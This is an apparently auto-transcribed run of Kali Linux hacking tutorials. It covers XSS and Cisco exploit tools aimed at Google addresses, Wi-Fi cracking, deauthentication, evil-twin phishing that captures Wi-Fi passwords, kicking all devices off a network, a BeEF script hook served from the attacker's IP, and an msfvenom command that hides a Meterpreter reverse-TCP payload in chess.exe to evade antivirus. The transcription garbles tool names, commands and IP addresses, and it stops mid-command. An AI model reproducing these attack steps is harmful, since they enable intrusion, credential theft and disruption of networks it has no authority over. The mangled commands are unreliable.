Thank you for watching this video. Welcome. In this video we are going to learn Treaty tool for checking XSS vulnerability. Treaty, it is an advanced pen testing framework dedicated to everything from vulnerability testing to cryptography. Let's open up terminal and type Treaty. Treaty tool is started here. Type help. Here you can see that functions of Treaty tool. Here I choose XSS simple check for XSS vulnerability. Type XSS. Now we get response as type victim machine URL. I will type https go.com $q equals to. It will scan with different XSS payloads. So here we can see that we found XSS vulnerability in Google, that is on mouse equals to prompt XSS post payload. So basically it just means that this payload can be applied here. Let's try with another URL. Type XSS, type URL http brutalogic.com.br webgun test.php $q equals to. Here you can see that XSS vulnerabilities payload. Using this Linux tool, you can check different websites. So that's it in this video on Treaty tool for checking XSS vulnerability. Thank you for watching this video. Welcome. In this video we are going to learn Cisco Global Exploiter, which is a vulnerability analysis tool in Linux. Cisco Global Exploiter, that is CGE, is an advanced, simple and fast security testing tool. Let's open up the terminal and type cg.pl. It's a simple and fast security testing tool. Here you can see that the basic syntax for Cisco Global Exploiter tool is Perl space cg.pl target space vulnerability number. This tool analyzes different vulnerabilities. You can see that here, that is Cisco 677 or 678 telnet buffer overflow vulnerability, Cisco iOS router denial of service vulnerability, Cisco iOS HTTP authentication vulnerability, and so on. Let's check vulnerability Cisco iOS HTTP authentication vulnerability on Google IP address 216.5.174.14. So for that I will type cge.pl space 216.58.174 space 3. That is, we are going for third option, that is Cisco iOS HTTP authentication vulnerability. Here you can see that it shows that vulnerability successfully exploited. Now let's try on Cisco iOS HTTP denial of service vulnerability. Type cg.pl 216.5.174 space 14. That is the 14th option, HTTP denial of service vulnerability. The packet is sent to Google. Now it's checking for server status. Here we can see that vulnerability is unsuccessfully exploited. Let's check on Cisco iOS software HTTP request denial of service vulnerability. So type cg.pl 216.58.174 space 8. Packet is sent to Google, waiting for response. Here you can see that 404 not found, status is found. Using this tool, you can analyze different websites. So that's all in Cisco Global Exploiter vulnerability analysis tool in Linux. Thank you for watching this video. Welcome, in this video we are going to learn Duna vulnerability analysis tool in Linux. Duna is a fork of brute force exploit detector tool, that is PED-BAD. BAD is a program which is designed to check daemons for potential buffer overflows, format string bugs, etc. Duna is Australian for do it. It adds a significant number of features or changes to BAD. Let's open up terminal and type Duna space -h. Network fuzzer forked from BAD, basic usage of Duna command .duna.pl space -m space -m module. Options. Let's see the options -m module, that is finger, FTP, HTTP, Nmap, IRC and so on. -t target, host to check, -p port, -p port to connect to and so on. Type nmap space google.com. It will take few seconds. Here you can see that HTTP and HTTPS ports are open. Let's use the HTTP plugin to fuzz the target, stopping after 5 cases. Here you can see that buffer overflow testing is started. Max request 5 complete. That's it in this video on Duna vulnerability analysis in Linux. Thank you for watching this video. Welcome, in this video we are going to learn Linus vulnerability analysis tool in Linux. Linus is an open source security auditing tool. Its main goal is to audit and harden Unix and Linux based system. It scans the system by performing many security control checks. Examples include searching for installed software and determine possible configuration flaws. Many tests are part of common security guidelines and standards, with on top additional security tests. After the scan, a report will be displayed with all discovered findings. To provide you with initial guidance, a link is shared to related NYNIS control. Let's start. Open terminal Linux and type LYNIS space -h. It has some written description about it, like it is open source tool and what all basic command options it has, like to show all commands, show version, show help, update and so on. Lots of options it has. The last one you can see here is scan the system in quiet mode, that is -q, and output in cron job format. So let's do it. LYNIS -q space -- cron job. Here you can see that it is scanning with quiet mode. So this is the output, detecting OS done, checking profiles done, program version 2.5.0, operating system Linux, kernel version 4.9.0, host name Kali, profile log file, report version plugin directory. That's it. Finally, output is saved in cron job format. So that's all in this video on Linus vulnerability analysis tool in Linux. Thank you for watching this video.
Welcome, in this video we are going to learn Cisco Torch and Cisco OCS tool. Cisco Torch was designed as a mask scanning, fingerprinting and exploitation tool. Cisco Torch is unlike other tools in that it utilizes multiple threads to launch scanning processes. It also uses several methods to simultaneously carry out application layer fingerprinting. Cisco Torch can be used for launching dictionary-based password attacks against the services and discovering hosts running the following services, that is Telnet, SSH, Web, NTP, SNMP. The main feature that makes Cisco Torch different from similar tools is the extensive use of forking to launch multiple scanning processes on the background of maximum scanning efficiency. Also, it uses several methods of application layer fingerprinting simultaneously if needed. We wanted something fast to discover remote Cisco host running Telnet, SSH, Web, NTP and SNM services and launch dictionary attack against the services discovered. Let's open up terminal, type Cisco Torch. Here you can see that Cisco Torch options, that is -o is output file, -a all fingerprint scan types combined, -t Cisco SSHD scan, -s Cisco SSH scan, and so on. Type Cisco Torch -a. Let's open up my victim machine Metasploit table 2. Let's log in. Type ifconfig. Here you can see that the IP address is 192.168.154.131. Here paste it in terminal. Here you can see that the FTP server is found. Next we are going to learn Cisco OCS tool. It is a mass Cisco scanning tool. Let's open up terminal. Type Cisco OCS. Here you can see that basic syntax. Cisco OCS, starting IP address and ending of IP address. That's it in this video on Cisco Torch and Cisco OCR package in Linux. Thank you for watching this video. Welcome, in this video we are going to learn Treaty tool installation and overview. Treaty, it is an advanced pen testing framework dedicated to everything from vulnerability testing to cryptography. Let's git clone the treaty.git, open the terminal and type git clone space https github.com toxic-ig treaty.git. Cloning is started, receiving the object 100% done. Let's change the directory, then run the installer script. Type cd space treaty sudo space python space install.py. The install.py script will install all of the necessary dependencies for us. Type 1 for Linux Ubuntu Raspbian OS. Here you can see that installation is loading. It will take few 1 to 2 minutes. Here you can see that finishing installation. Let's run treaty. Type treaty. First time it will ask, do you agree to these terms and condition? Type Y. Treaty is started. That's it in this video. In next video we'll learn treaty function and treaty information gathering tool. Thank you for watching this video. Welcome, in this video we will see BBQ SQL blind SQL injection Linux. Blind SQL injection can be pinned to exploit. When the available tools work, they work well, but when they don't, you have to write something custom. This is time consuming and tedious. BBQ SQL is blind injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQ SQL is also a semi-automatic tool, allowing quite a bit of customization for those hard-to-trigger SQL injection finding. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive user interface to make setting up attacks much easier. Python programming is also implemented, making BBQ SQL extremely fast. Similar to other SQL injection tools, must provide the usual information, that is URL, HTTP method, headers, cookies, encoding methods, redirect behavior, files, HTTP authentication, proxies, then specify where the injection is going and what syntax we are injecting. If you run into SQL injection vulnerability that has some weird quirks,
such as certain characters can't be included or functions like ASCII or char do not work, you have probably found yourself writing some sort of script with your custom injection syntax. BBQ SQL takes out scripting part and provides a way for you to paste in your custom query syntax and exploit with ease. The query input is where you will construct your query used to exfiltrate information from the database. The assumption is that you already have identified SQL injection on a vulnerable parameter and have tested a query that is successful. Let's open up BBSQL application 04 database assessment BBQ SQL. Here we can see that BBSQL is started, many option, set up BBSQL option, export config, import config, run exploit, help, credit and about. Type 1. Now we need to determine what our HTTP request will look like. 0 for files, 1 header, 2 GUI and so on. Let's change URI value. Type 3. Let's open a browser and type published.com. This site is SQL vulnerable website. Paste it in terminal, click on enter. Here we can see that the URL is changed. Type 99, go back to the option menu, type 6 for help, and so on. You can try different options. In this video, I have explained it in brief. For in-depth in SQL injection, do enroll into my other course, that is A to Z ethical hacking, bug bounty web hacking, and so on, other courses where I have explained SQL injection in depth. That's all. Thank you for watching this video. Welcome. In this video, you will see SSL scan. SSL scan is a fast SSL port scanner. SSL scan connects to SSL ports and determines what cipher are supported, which are the server preferred cipher, which SSL protocols are supported, and returns the SSL certificate. Let's see SSL scan in practical in Kali Linux operating system. First, go to terminal and type SSL scan. Here you can see the options of SSL scan. Type SSL scan www.google.com 443. 443 is SSL port. Here you can see the details of Google and you can see the server cipher. It will show both rejected and accepted ports. To see only accepted ports, type SSL scan --no--failed google.com 443. Now you see only accepted ports. The Google is good here as it uses SSL v3 and ES256 and ES128 is not good for encryption cipher. And here you see the SSL certificate. In certificate you see the signature algorithm which shows this used RSA encryption. Now I am trying my website SSL scan 107.180.54.186.443. Here we can see my website which cipher technique is used, and you can see the certificate and signature and encryption technique. So that's all in this video on SSL scan. Thank you for watching this video. Welcome. In this video you will see AirCrackNG wireless attack tool in Kali Linux. AirCrackNG is an 802.11 WEP and WPA PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with correct attacks as well as all new PTW attack, thus making the attack much faster compared to the other WEP cracking tools. It focuses on different areas of Wi-Fi security, monitoring, that is packet capture and export of data to text files for further processing by third-party tools, attacking, that is replay attacks, deauthentication, fake access points and other via packet injection, testing, checking Wi-Fi cards and driver capabilities, cracking WEP and WPA PSK, that is WPA1 and WPA2. Let's open up the terminal and type AirCrackNG. Here you can see that basic usage or syntax of AirCrackNG tool. Common options are -A force to attack mode, -E target selection network identifier, -B target selection access points MAC and so on.
Let's see the static WEP cracking option. -C search alphanumerical character only. -T search binary coded decimal character only, and so on. For WEP and WPA PSK cracking, -W part to word list. WEP and WPA PSK option, -E create EVWSA project file. -J create hashcat capture file. Using the provided word list, that is -W, user share word list nmap.lst, attempt to crack password in capture file, that is capture01.cap, type aircrackng -W, user share word list nmap.lst. You can see that nmap.lst file in word list directory and type capture-01.cap. This file are downloaded from GitHub website. You can see that GitHub downloading page. I downloaded and pasted in the root directory because console path is root. Here we can see that capture01.cap read 399 packets. Type number of target network, index, and encrypt it. That's it in this video on aircrackng wireless attack tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn host APD WPE wireless attack tool in Linux. Host APD WPE is a replacement of FreeRadius WPE. It implements IEEE 802.1x authenticator and authentication server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable. Host APD WPE supports the following EAP types for impersonation. First one, EAP fast MSCHAP v2, PEAP MSCHAP v2, EAP TTLS MSCHAP v2, and so on. Once impersonation is underway, host APD WPE will return an EAP success message so that the client believes they are connected to their legitimate authenticator. For 802.11 clients, host APD WPE also implements Karma-style gratuitous probe response. Inspiration for this was provided by Jomocon's patch for older version of host APD. Let's open up terminal and type apt install host -WPE. Here I already installed host WPE tool. Let's open up terminal. Now kill network manager using eromon-ng. Type eromon-ng, check, kill. Let's start host APD-WPE. A wireless access point will appear. Passwords of users connecting and authenticating to this network will be printed to the console. Type host APD-WPE, etc host APD-WPE, host apd-wp.conf. Here you can see that N180211 the in8 f name equals to line 0, disabled 11b underscore rates is equal to 0, line 0 interface state is uninitialized, stabled. Once a challenge and response are obtained, then crack them using a sleep together with the password dictionary file. That is type zcat user share word list docu.txt.gz or asleep-c 8e 0e 9d and so on, then -r, then 34f8 and complete that id, then -w. Here you can see that using stdin for words, hash bytes 586c, anti-hash 8846f7, EAEE8FB, and so on. Password is password. So that's it in this video on host APD WPE wireless attack tool in Linux. Thank you for watching this video. Welcome. In this video, I will show you the best wireless hacking toolkit on Linux. WireSpy is an advanced automate MITMF attacks framework which can perform
many wireless hacking stuffs like monitoring, logging, DNS spoofing, MAC address spoofing, and many more. Download it from this link. It is https://github.com/res31 wirespy.git. Wirespy. It automates man-in-the-middle attack over Wi-Fi. Wirespy allows attacker to set up a quick honeypots to carry out MITMAs. Monitoring and logging functionalities are implemented in order to keep records of the victim's traffics or activities. Other tools can be used together with Wirespy to further more advanced attacks. Two types of attacks are supported at the moment. Honeypot. Set up a simple rogue hotspot and wait for clients to connect. Evil Twin. Force victim to auto-connect to the honeypot by spoofing a trusted hotspot. More features: power amplification, MAC address spoofing, deauthenticate its user to force them to transparently auto-connect to the Evil Twin access point, monitoring the victim's traffics, logging the victim's traffics. Let's open up github.com/res31/wirespy. Link in the browser, copy the git link wirespy, open up terminal, type git clone and paste the copied URL and hit enter. Cloning is started. Tool ID downloaded successfully. Change terminal desktop directory to wirespy. Type cd space wirespy. Here you can see that wirespy.py Python file. Let's run wirespy.py file. Type sudo /wirespy. Here you can see that features of Wirespy tool. First one, rogue access point. Rogue access point to the man-in-middle attack and network attacks, purporting to provide wireless internet services but snooping on the traffic, can be used to capture of credential of unsuspecting user by either snooping the communication by phishing. Second, Evil Twin access point. An attacker can easily create an evil twin with a smartphone or other internet-capable device and some easily available software. The attacker positions himself in the vicinity of a legitimate hotspot and lets his device discover what services set, identifier, and radio frequency the legitimate access point uses. He then sends out his own radio signal using the same name as the legitimate access point. To the end user, the evil twin looks like a hotspot, very strong signal. That's because the attacker has not only used the same network name and settings as the good twin he is impersonating. He has also physically positioned himself near the end user so that his signal is likely to be strongest within the range. If the end user is tempted by the strong signal and connects manually to the evil twin to access the internet, or if the end user's computer automatically chooses the connection because it is running in Prometheus mode. Third, display or hide DHCP leases. Fourth, Wi-Fi start or stop sniffing. A wireless sniffer is a type of packet analyzer. A packet analyzer is a piece of software or hardware designed to intercept data as it is transmitted over a network and decode the data into format that is readable for humans. Fifth, start or stop DNS poisoning. DNS cache poisoning, also known as DNS spoofing, is a type of attack that exploits vulnerabilities in the domain name to divert internet traffic away from legitimate server and towards fake ones. One of the reasons DNS poisoning is so dangerous is because it can spread from DNS server to DNS server. Sixth one, boost up wireless card. So that's it in this video on Wirespy wireless hacking tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn hacking Wi-Fi using Reaver in Linux. Reaver is one of the best tools to come along in a long time. Before WPA was implemented, WEP ruled wireless encryption. Any network could be cracked easily. But when WPA became the standard, it became much harder to do and using the dictionary attack method was the only real option. Then came the reaver. Reaver works by a flaw found in routers called WPS or Wi-Fi protected setup. WPS makes it easy for wireless devices to find and connect to a router. The problem with WPS is it has a flaw in it that lets someone go around the encryption. Set up a router with WPA or WPA2 for encryption and give it a password. Enable WPS if it is not already and connect to it wirelessly with a separate device simulating a real environment. First thing we need to do is enable the wireless USB adapter. Let's open up terminal. Type ermon ng check LAN 0. Here you can see that two processes are running in the background, so we need to kill all those processes using kill command. Type ermon ng check kill. Here you see that still one process is running in the background. Execute kill command. All processes are killed successfully. Clear the screen. Wireless USB adapter is working. We need it enabled in monitor mode, so type ermon ng start LAN 0. Finding a WPS enabled router is the next step. This used to be hard to do until the wash command came along. Before the wash command, every router would have to be found and then tested to see if WPS was enabled. The wash command will list only WPS enabled routers. Type ifconfig. Here you can see that monitor mode interface. The wash command has been notorious for having problems and not working correctly. Basically, the wash command goes out and tells you if a router has WPS enabled, so you don't waste your time running the router. I believe I found the fix that has been working for me on both Backtrack 5 and Linux. Here I am using Linux OS. Type wash -i LAN 0 mon. You see that nearest Wi-Fi routers and BSS ID, channel number, WPS version, so on. Copy the BSS ID to paste it when needed later on. Then press Ctrl+C to stop the terminal window using wireless USB adapter. If nothing comes up, then no WPS enabled router is within the reach. Run the aerodump ng LAN 0 mon command to see all the access point within your reach. Only do this if the wash command finds nothing. Now we can use the reaver. Be sure the terminal window running the wash command is not actively using the wireless USB adapter. By pressing Ctrl+C inside of it, you can copy and paste the BSS ID. Type reaver -h. You can see that the basic usage of reaver and its basic options and example. Let's execute this tool on reaver tool. Type reaver -i is used for LAN 0 mon and -b options to target BSS ID -vvv-k1. Here you can see that WPS pin cracking is started over here. It will take few minutes to hours to crack. Here I am forwarding video. Here you can see WPS pin and the PSK, that is password. So that's it in this video on hacking WPS Wi-Fi using reaver in Linux. Thank you for watching this video.
Welcome. In this video, we will see cracking Wi-Fi, WPA, WPA2 passwords using GoPatty. First, let's see what is GoPatty tool. Implementation of an offline dictionary attack against WPA or WPA2 networks using PSK-based authentication. Many enterprise networks deploy PSK-based authentication mechanism for WPA or WPA2 since it's much easier than stabilizing the necessary radius, supplicant and certificate authority architecture needed for WPA enterprise authentication. GoPatty can implement an accelerated attack if a pre-computed PMK file is available for SSID that is being assessed. In this video, we are going to learn how the Wi-Fi password is cracked by using GoPatty tool. Let's start. First, open a terminal in Linux, type iwconfig to know the interface name. Now to start monitor mode, type airmon ng start line 0 mon. You see I already enabled the monitor mode on my interface. Now type aerodump ng flan 0 mon to see the nearest Wi-Fi network. Here you see some devices are nearest to interface. Now stop this by Ctrl+C. Select your target Wi-Fi. Now to see how many devices are connected to the target Wi-Fi, type aerodump ng-c 2 basis ID, that is 6C72 and so on, -w root desktop ls, that is path where the captured packets are to be saved. Here you see the captured packets are saved on desktop. Now to remove the device which is connected to the target Wi-Fi, type airplay ng-0 0 6C72 and so on -c64db and so on line 0 mon. Now let's take the mobile screen on the right side of our screen to see the device which you are removing. You see our device is disconnected from the network. Wait for some time when the user device reconnected to the Wi-Fi. Here you see handshaking notification is showing. Now open a new terminal and type GoPatty space -f root documents words.lsd space -r root desktop lic-o1.cap space -s d-link, that is access point. To know better, open a terminal and type GoPatty -help. You see the options of GoPatty. Now enter. Here you see the password of target Wi-Fi. So that's it in this video on cracking Wi-Fi WPA WPA2 password using GoPatty. Thank you for watching this video. Welcome. In this video, we will crack Wi-Fi password by using hostpad WPE. First, let's see what is hostpad WPE tool. A major component of hacking IEEE 802.11 wireless network is targeting the client system. This is because of trusting nature of wireless and corporate system can be tricky to configure correctly. But don't forget that the same client-side attack against 802.11 wireless network can be used on wired network with port security. The attacker has physical access to workstation or access switch. The hostpad WPE provides a means to execute client-side attacks on wired and wireless networks. In this video, we are going to learn how the Wi-Fi password is cracked by using hostpad WPE. So let's start. To install the hostpad WPE, first open the Google, type host apd wp github, click on GitHub link. Now copy that address to install in Kali. Now open a terminal in Linux, type git clone and paste the address. Here it started to cloning. Now type apt update to update. Wait, it will take some time. Now type apde wp to install. Here it started to install. Wait, it will take some time. Now type ls space -l etc host apd wp. Here you see the content of host apd wp file. Now type nano etc host apd wp.conf to give the name for your network. Here it open. Now go to SSID option. Give any name. You can give the same name as your target Wi-Fi. Here I'm giving the same name to show the demo. To save, press Ctrl and X and enter. Now press clear to clear the screen. Now type airmon ng check kill to kill all unwanted process. Now type to enable your network host apd-wp.conf. Let's bring the mobile screen here on the right side.
Here you see our fake network has came when user entered the password, filling necessary information like name. Here I am giving name Rahul and password I am giving Rahul12345667. As you see, the user pressed the enter. The Wi-Fi information is captured by host APD WPE, as you can see here. Now type a sleep-r, copy the address from response statement. -w root documents words.txt, give the path of word list. Now here you see the password of Wi-Fi is Rahul12345667, which is entered by the user. That's it in this video where Wi-Fi password is cracked by using host PDE WPE. Thank you for watching this video. Welcome. In this video we are going to learn how to kick all devices except your device by using NetAttack2 tool. So let's start. I'll not introduce what is NetAttack2 tool and from where to download it and install it, as I have already discussed in one of the previous video on NetAttack2 tool. So I will begin by starting up the tool. So for that I will type python space netattack2.py to start the tool. Here you see it started. You can see the modules of the tool. Here I am using option 8 to disconnect all the devices. Here you can see the local address and current IP range. Now hit enter to start the scan. Now let me place the mobile screen on side of the desktop here. Here you see the list of all the host area connected to the network. Here you see the attack is started. Now to stop this attack, press Ctrl+C. Here you see all the devices are back in normal condition. Here attacker can use all bandwidth of network by blocking all devices. So that's how you kick all users off your network, and I showed here that even the mobile also disconnected from the network. So that's all. Thank you for watching this video. Welcome. In this video we will see Wi-Fi password hack using Wi-Fi Fisher. First let's understand what is Wi-Fi Fisher. Wi-Fi Fisher tool uses Evil Twin attack scenario same as Evil Twin tool. The tool first creates a phony wireless access point, masquerade itself as legitimate Wi-Fi access point. It then directs a denial of service attack against legitimate Wi-Fi access point or creates RF interface around it that disconnects wireless user of the connection and prompts user to inspect available networks. Once disconnected from legitimate Wi-Fi access point, the tool then forces offline computers and devices to automatically reconnect to the Evil Twin, allowing the hacker to intercept all the traffic to that device. The technique is also known as AP phishing, Wi-Fi phishing, hotspotter, or honeypot AP. These kind of attacks make use of phony access points with fake login pages to capture users' Wi-Fi credentials, credit card numbers, launch man-in-middle attacks, or infect wireless hosts. As soon as the victim requests any web page from the internet, Wi-Fi Fisher tool will serve the victim a realistic fake router configuration looking page that will ask for WPA password confirmation due to a router firmware upgrade. The tool thus could be used by hackers and cyber criminals to generate further phishing and man-in-the-middle attacks against connected users. In this video, we will see how the Wi-Fi is hacked by using Wi-Fi Fisher. Let's start. First open Google and type Wi-Fi Fisher GitHub and select the option. Now the GitHub website is open. Copy that clone address. Now open the terminal in Linux and type cd desktop, making a clone path on desktop. Now type git clone https github.com wififisher.git, then press enter. Here you see it's getting clone of Wi-Fi Fisher on desktop. Now type ls to see the list in desktop. Here you see the cloned copy of Wi-Fi Fisher. Now make a path to Wi-Fi Fisher folder. Now type cd Wi-Fi pg hisher. Now type ls to see the content of the folder. Here you see some folders. Now to start Wi-Fi PG Fisher, type sudo python setup.py install. Here you see it's installing or starting. Here it started. Now open a new terminal and type Wi-Fi Fisher no jamming.
Here you see some Wi-Fi network. Select your target Wi-Fi. Here I am selecting D-Link. After selecting target Wi-Fi, now select option 2 to firmware upgrade pages. Here you see now the windows appears. Here I am using in my mobile. Here you see replica that Wi-Fi is generated. That Wi-Fi are disconnected for some time. Here see I'm trying to connect that Wi-Fi. It's asking for security. It's asking once again the password to enter. When user enters the password, wait for some time. Now you see the password of that Wi-Fi. So this is how Wi-Fi password hack is done using Wi-Fi Fisher. That's it in this video. Thank you for watching this video.
Welcome. In this video we will see BEEF. BEEF stands for Browser Exploitation Framework. It is penetration testing tool that focuses on the web browser. The BEEF allows the professional penetration tester to assess the actual security posture of a target environment using client-side attack vectors. The BEEF is a powerful professional security tool. BEEF is pioneering technique that provide the experienced penetration tester with practical client-side attack vectors. Unlike other security frameworks, BEEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing. BEEF hooks one or more web browser as a beachhead for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. The framework allows penetration tester to select specific modules to target each browser, and therefore each context. The framework contains numerous command modules that employ BEEF's simple and powerful API. This API is at the heart of framework's effectiveness and efficiency. It abstracts complexity and facilitates quick development of custom modules. Now we'll learn how to use BEEF XSS framework. Let's open up Linux. Now I will click on BEEF framework icon. Here you can see that BEEF framework opened in terminal and XSS.js code for exploiting. And XSS.js code for exploiting, that is script src equals to http localhost, that is 127.0.1 3000 hook.js, and the end of script. Now BEEF framework is opened in browser. Type username and password as BEEF. Here I deleted old exploit history. Now open bbox and open terminal. Type ifconfig. Let's copy the IP address. Now open bbox in Linux. Log into the pwap. Now select the drop-down option as XSS reflected. Now let's check for XSS vulnerabilities. I will type first name as Amit Hudar and last name as XSS JavaScript, that is script alert XSS end of script tag, and click on go. Here you can see that XSS pop-up message is open displayed. Now let's find the Linux IP address. Open new terminal and type ifconfig. IP address is 192.168 and so. Let's copy it inside this script tag, that is script src http 127.0.1 3000 hook.js, that is BEEF exploit.js code. Inside that, instead of localhost, add that 192.168 and so. So for that, now let's open up pwap. I'll type first name as Amit Hudar, last name as script src equals to 192.168, that is instead of localhost. After that 3000 hook.js script, and click on go. Here we get welcome Amit Hudar. In source code our XSS code is reflected. Now open BEEF framework and refresh it. Here you can see that online browser, that is 192.168.154.130 IP address. Click on the IP address. Here we see exploit browser history. The current browser is Mozilla Firefox, English US, browser platform Linux, plugins, Windows size, Browser components, that is Flash is no VB just WebSockets is S, and WebRTC S, Session Cookie S, Persistent Cookie S, rest of them are no. And in category hooked page, page title pwap access S, page URL, page referrer, host name, and cookie. Further option in current browser we saw all the details. Let's go to logs. You can see the logs of browser, commands, lots of commands to use when it is hooked. Rider, access arrays, IPEC, network, that is in what network. This is how it should be, that is localhost, hooked browser, the firewall for internet, and here is the beef. The host is localhost. Lots of options you have inside beef. So that's all about beef XSS exploit tool. I have not just explained the tool, I have demonstrated how XSS vulnerable page can be hooked to the beef to exploit further. That's all. Thank you for watching this video. Welcome. In this video we will see Armitage, the graphical management tool for Metasploit. The newer version of Metasploit utilizes a graphical front-end tool called Armitage. Understanding of Armitage is important because it ultimately makes your usage of Metasploit easier by providing information to you visually. It encompasses the Metasploit console, and by using its tabbing capabilities allows you to see more than one Metasploit console or Meterpreter session at a time. Armitage graphical user interface for Metasploit is complement tool for Metasploit. It visualizes targets, recommends exploits, and exposes the advanced post-exploitation features. Let's open it, but first Metasploit console should be open and started. To open Armitage, go to Application, Exploit Tools, Armitage. It will take few minutes. It may take Armitage a while to connect to Metasploit. While this takes place, you may see the following notification window. Do not be alarmed, it will go away once Armitage is able to connect. Click the Connect button. On the Start Metasploit screen, click on S. Armitage is user-friendly. The area targets list all the machines that you have discovered and you are working with. The hacked targets are red in color with a thunderstorm on it. You are then presented with Armitage main page. We will now discuss the following three regions on the main page. This region displays the pre-configured modules. You can search for modules using the space provided below the module list. This region displays your active targets that we are able to run our exploits against. This region displays multiple Metasploit tabs, allowing for multiple Meterpreter or console session to be run and displayed simultaneously. So that's it in this video on mastering Armitage, the graphical management tool for Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn Metasploit basic commands. Let's open up MSF console. The help menu can be viewed by issuing the help command. So in Metasploit, type help. Here you can see that Metasploit framework help options, core commands, module command, job command, and so on. The help command will give you a limited list of commands which you can use in MSF console. Whenever you want the help, you can type the help to get to know about it. Info is another basic command in Metasploit that enables us to see all the basic information about an exploit. After selecting an exploit, type info command. Here we can see that the basic usage and its options for info command. Info and the module name. So type info ARMLE or simple. We can see that all of the options, targets, and a description for the exploit. Set is a basic and critical command or keyword in Metasploit. We can use it to set parameters and variables necessary to run the exploit. These variables can include the payload, the rhost, the lhost, the target, URI path, etc. Let's type set space -h. Here you can see that set command usage as set options value. Now let's set rhost value. So type set rhost 8.8.8.8. Here you can see that rhost is set. We can unset the value using unset method. So type unset rhost. Here you can see that rhost is unset. So that's it in the first part of Metasploit basic commands. Thank you for watching this video. Welcome. In this video we will see Metasploit basic command part 2. In the previous video we have already learned few basic command, that is help, info, set and unset. In this video, first let's see search command. As Metasploit contains over 1500 different exploits and the new ones are added regularly, with this number of exploits the search function and knowing how to use it becomes very important. The easiest way of using the search function is by issuing the command search followed by a search term. So type search. Here you can see that it will search all modules. Type search space -h. Here you can see that the search command, basic usage and its option. App module that are client or server attacks. Author module written by this author and so on. So let's search exploit module. Copy and paste the example. Search CVE 2009 type exploit app client. Here you can see that the module is released in 2009 and the type as exploit. Use command. The use command is used to interact with the module of a given name. So type use, basic usage as use module name. So type use exploit /windows/ftp pro ftp banner. Show options command. The show options command will show you the available parameter for an exploit if used when the command line is in exploit context. Let's use the Adobe Flash shader drawing fill exploit and have a look at the option with the following command. The Flash exploit contains a total of 6 options from which only 2 are required. In retrieve, SRV host is required and SRV port is required. SSL, SSL-CRT, URL path are not required. Now let's see the session command. The session command is used to list or set a session. When used with the -l, that is list switch, it will list all open sessions. When used with the number, that is session space -1, it tells Metasploit to activate the first session. Metasploit allows us to run multiple sessions on the same system or multiple sessions on multiple systems. Using the session command, we can find these open sessions and switch to or activate them. Type session. Here we can see that no session is activated. Exploit command. After choosing our exploit, setting all our variable and choosing our payload, the last thing we have to do is to type the exploit command. This launches the exploit against the target machine with the payload and any variables we might have set. And the run command also works same. Back command. When we're done working with particular module or we choose the wrong module, we can use the back command to return to the MSF console prompt. For instance, if we choose an exploit and then we realize we have took the wrong one, we can simply type back and then use the use command to select another module. So that's it in this video on part 2 of Metasploit basic command. Thank you for watching this video.
Welcome, in this video we are going to learn PompM Exploit Finder tool in Linux. PompM Exploit Finder is an open source tool which is designed to automate the search for the exploits in major databases. Developed in Python as a system of advanced search, thus facilitating the work of pen testers and ethical hackers. In its current version, performs searches in databases, exploit DB 1337 days, packet storm security, and so on. Let's open up the browser and go to github.com refunix pompm, copy the git link, back to Linux, back to Kali desktop, open terminal, type git clone, let's paste copied git link. Here you can see that cloning is started, download successfully, change the terminal directory to pompm, type cd space pompm, let's see pompm directory files and directory, type ls, here you can see that pompm.py python tool, let's run it, type python pompm.py, here you can see that the basic usage, pompm.py, -s, -search, and the keyword, and the options as usual, that is help, HTML, update, get. So let's search Joomla. For that I will type python space pompm.py space -s Joomla. Here you can see that the results of Joomla latest vulnerabilities, headers as date, description, URL, date 2017-07-20, description, Joomla, Joomla recipe 1.0.4, SQL injection, and so on. Let's search WordPress. So I'll type python pompm.py -s WordPress. Here we can see that WordPress latest vulnerabilities. So on, you can check for different web technologies in PompM Exploit Finder tool. That's all. Thank you for watching this video. Welcome, in this video we will see MSF Venom in Kali Linux. Eluding and evading antivirus software and intrusion detection system is one of the most critical tasks of the hacker. As soon as new exploit is developed and discovered, the AV and IDS developer build a signature for the attack, which is then likely to be detected and prevented. To re-encode a payload in Metasploit, you had to pipe MSF payload through MSF command, which will be shown in this tutorial. Recently, Rapid7, the developers of Metasploit, introduced a new command that takes the place of clunky combination of MSF payload and MSF encode to streamline the process of re-encoding a Metasploit payload. Let's take a look at it in this guide. First, re-encoding payloads. Re-encoding a Metasploit payload used to work for evading AV and other security devices, but the people who developed AV software are not dumb. They have now found ways to detect even a re-encoded payload from Metasploit. Let's open up terminal. You can do that by simply typing MSF console, or you can use the graphical user interface. For that, go to Applications, Kali Linux, Top 10 Security Tools, Metasploit Framework. Type MSF console, see the MSF Venom options. Now at the prompt, type MSF Venom to pull up its help page. Let's take a look at some of the most important options in this list. -p designates Metasploit payload we want to use. -e designates the encoder we want to use. -a designates the architecture we want to use, that is x86. -s designates the maximum size of the payload. -i designates the number of iterations with which to encode the payload. -x designates a custom executable file to use as a template. Now list the encoders. Encoders are various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes. Type MSF Venom
-L encoders. Metasploit will then list all of the available encoder with each ranks and description. You can see the name of encoders and the rank and description. The rank varies from good, manual, low, normal, excellent, great, and so on. For echo command encoder. For generic shell variable substitution command encoder, and so on. Note that shikata_ga._nai is ranked excellent. Now view the payload options. We can use MSF Venom to check options that we need to set for any payload similar to show option in Metasploit console. If you want to check the option for Windows Meterpreter _TCP payload, type MSF Venom -p Windows Meterpreter _TCP -0. If we want to work with this payload, we now know what options we need to set in the MSF Venom command. Create a custom Windows executable. Now let's create a custom Windows executable with a custom template. Although we cannot create a payload without a custom template, you have a better chance of getting past security devices and AV if you use a custom template. In this case, we'll use a chess game named chess.exe. The idea here is that we will embed Meterpreter payload into the chess game, and then when the victim opens the game to play chess, it will open a Meterpreter session on our system. To create a malicious executable with Windows Meterpreter _TCP embedded inside, type MSF Venom -p Windows Meterpreter _TCP lhost = 192.168.154.130, lport = 6996, -x user share chess.exe, -e x86 shikata_ga_nai -i200 -f exe chess.exe. -p Windows Meterpreter 